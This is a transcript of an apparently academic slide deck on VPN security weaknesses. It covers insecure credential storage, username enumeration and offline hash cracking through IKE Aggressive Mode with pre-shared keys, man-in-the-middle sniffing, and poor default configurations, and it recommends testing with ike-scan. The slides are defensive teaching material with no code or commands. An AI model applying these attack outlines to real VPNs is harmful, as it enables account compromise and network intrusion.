VPN AND SECURITY FLAWS
Download
Report
Transcript VPN AND SECURITY FLAWS
VPN AND SECURITY
FLAWS
Rajesh Perumal
Clemson University
VPN – AN ATTRACTIVE TARGET
Carry Sensitive information
Remote access VPNs exposes entire
internal network
Intrusion Detection Systems cannot
Monitor VPN Traffic
Increase in security in Internet
servers makes VPN a tempting
Target.
VPN FLAWS
Insecure storage of Authentication
credentials by VPN Clients
Username Enumeration Vulnerabilities
Offline Password Cracking
Man in the Middle Attacks
Lack of Account Lockout
Poor Default Configurations
Poor Guidance and Documentation
Insecure storage of Authentication
credentials by VPN Clients
Storing the username unencrypted in
a file or the registry
Storing password in scrambled form
or obfuscated form
Physical memory dumps can reveal
plain text passwords
Caching credentials
Username Enumeration
Vulnerabilities
IKE Aggressive Mode with PSK will
prompt or give clue the hacker, the
login name is incorrect. So the hacker
can deduce the correct user names.
Offline Password Cracking
Easy to obtain Hash function.
Responder hash is obtained
Dictionary attack on the password will
reveal in feasible amount.
Man in the Middle Attacks
By installing a packet sniffing system between the
VPN client and server , we can sniff clear text user
names and the password can be cracked by the 1st
and 2nd packets of the IKE Aggressive mode
exchange.
The sniffing system (SS), acts as a server for the
client and as a client for the server. SS can get
passwords, user names and ISAKMP message from
the client and issue its own ISAKMP message.
Similarly the sniffer can send its own ISAKMP
message, since the user name and password is
known.
Poor Guidance and Documentation
End user is not provided with proper
documentation and is not well
informed to take proper decisions.
User goes with default settings,
default encryption.
CONCLUSION
Remote access VPN systems , 90% have had significant
security issues.
Cryptographic Techniques adopted are strong but
vulnerabilities are due to poor configuration.
Well accepted security practices are not adopted.
Info leaking about valid usernames is prevented in OS but not
in VPN.
Users make Default configuration on the basis of ease of use
rather than security. Eg. IKE Aggressive mode with PSK
authentication
Users do not know the intensity of bad Configuration options.
Proper testing is needed. Tools like “ike – scan” should help
testing the VPN.